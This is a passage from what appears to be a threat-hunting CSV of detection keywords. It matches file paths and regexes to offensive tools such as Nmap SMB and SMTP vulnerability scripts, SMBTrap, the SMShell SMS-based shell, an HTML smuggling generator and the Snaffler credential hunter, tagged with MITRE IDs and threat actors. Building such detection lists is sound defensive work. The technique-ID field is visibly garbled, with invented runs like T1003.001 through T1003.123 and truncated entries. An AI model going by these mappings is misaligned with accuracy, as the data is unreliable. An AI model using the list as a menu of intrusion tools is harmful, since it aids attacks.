for 
interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","11414" "*/smbsr_results.csv*",".{0,1000}\/smbsr_results\.csv.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","11415" "*/smb-system-info.nse*",".{0,1000}\/smb\-system\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11416" "*/Smbtouch-Scanner.git*",".{0,1000}\/Smbtouch\-Scanner\.git.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","1","N/A","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","11417" "*/SMBTrap.git*",".{0,1000}\/SMBTrap\.git.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & 
Spoofing","https://github.com/cylance/SMBTrap","1","1","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","11418" "*/smbtrap2.py*",".{0,1000}\/smbtrap2\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","1","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","11419" "*/smbtrap-mitmproxy-inline.py*",".{0,1000}\/smbtrap\-mitmproxy\-inline\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","1","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","11420" "*/smb-vuln.py*",".{0,1000}\/smb\-vuln\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","11421" "*/smb-vuln-conficker.nse*",".{0,1000}\/smb\-vuln\-conficker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11422" "*/smb-vuln-cve2009-3103.nse*",".{0,1000}\/smb\-vuln\-cve2009\-3103\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11423" "*/smb-vuln-cve-2017-7494.nse*",".{0,1000}\/smb\-vuln\-cve\-2017\-7494\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11424" "*/smb-vuln-cve-2020-0796.nse*",".{0,1000}\/smb\-vuln\-cve\-2020\-0796\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","11425" "*/smb-vuln-ms06-025.nse*",".{0,1000}\/smb\-vuln\-ms06\-025\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11426" "*/smb-vuln-ms07-029.nse*",".{0,1000}\/smb\-vuln\-ms07\-029\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11427" "*/smb-vuln-ms08-067.nse*",".{0,1000}\/smb\-vuln\-ms08\-067\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11428" "*/smb-vuln-ms10-054.nse*",".{0,1000}\/smb\-vuln\-ms10\-054\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11429" "*/smb-vuln-ms10-061.nse*",".{0,1000}\/smb\-vuln\-ms10\-061\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11430" "*/smb-vuln-ms17-010.nse*",".{0,1000}\/smb\-vuln\-ms17\-010\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11431" "*/smb-vuln-regsvc-dos.nse*",".{0,1000}\/smb\-vuln\-regsvc\-dos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11432" "*/smb-vuln-webexec.nse*",".{0,1000}\/smb\-vuln\-webexec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11433" "*/smb-webexec-exploit.nse*",".{0,1000}\/smb\-webexec\-exploit\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11434" "*/SMShell.git*",".{0,1000}\/SMShell\.git.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","N/A","10","10","360","35","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z","11435" "*/SMShell/*",".{0,1000}\/SMShell\/.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","#linux","N/A","10","10","360","35","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z","11436" "*/smtp-brute.nse*",".{0,1000}\/smtp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11437" "*/smtp-commands.nse*",".{0,1000}\/smtp\-commands\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11438" "*/smtp-enum-users.nse*",".{0,1000}\/smtp\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11439" "*/smtp-ntlm-info.nse*",".{0,1000}\/smtp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11440" "*/smtp-open-relay.nse*",".{0,1000}\/smtp\-open\-relay\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11441" "*/smtp-strangeport.nse*",".{0,1000}\/smtp\-strangeport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11442" "*/smtp-user-enum*",".{0,1000}\/smtp\-user\-enum.{0,1000}","offensive_tool_keyword","smtp-user-enum","Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN - VRFY or RCPT TO.","T1133 - T1110.001","TA0007 - TA0006","N/A","N/A","Credential Access","https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11443" "*/smtp-vuln-cve2010-4344.nse*",".{0,1000}\/smtp\-vuln\-cve2010\-4344\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11444" "*/smtp-vuln-cve2011-1720.nse*",".{0,1000}\/smtp\-vuln\-cve2011\-1720\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11445" "*/smtp-vuln-cve2011-1764.nse*",".{0,1000}\/smtp\-vuln\-cve2011\-1764\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11446" "*/smtp-vuln-cve2020-28017-through-28026-21nails.nse*",".{0,1000}\/smtp\-vuln\-cve2020\-28017\-through\-28026\-21nails\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","N/A","7","627","59","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z","11447" "*/smuggler.py*",".{0,1000}\/smuggler\.py.{0,1000}","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","1","N/A","N/A","9","3","299","55","2024-08-08T06:11:06Z","2023-01-15T22:37:34Z","11448" "*/SnaffCon.cs*",".{0,1000}\/SnaffCon\.cs.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - 
T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","11449" "*/SnaffCon/Snaffler*",".{0,1000}\/SnaffCon\/Snaffler.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - 
T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","11450" "*/SnaffCore/*",".{0,1000}\/SnaffCore\/.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - 
T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","11451" "*/Snaffler.exe*",".{0,1000}\/Snaffler\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11452" "*/Snaffler.exe*",".{0,1000}\/Snaffler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11453" "*/snaffler.py*",".{0,1000}\/snaffler\.py.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","1","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","11454" "*/snafflertest/*",".{0,1000}\/snafflertest\/.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - 
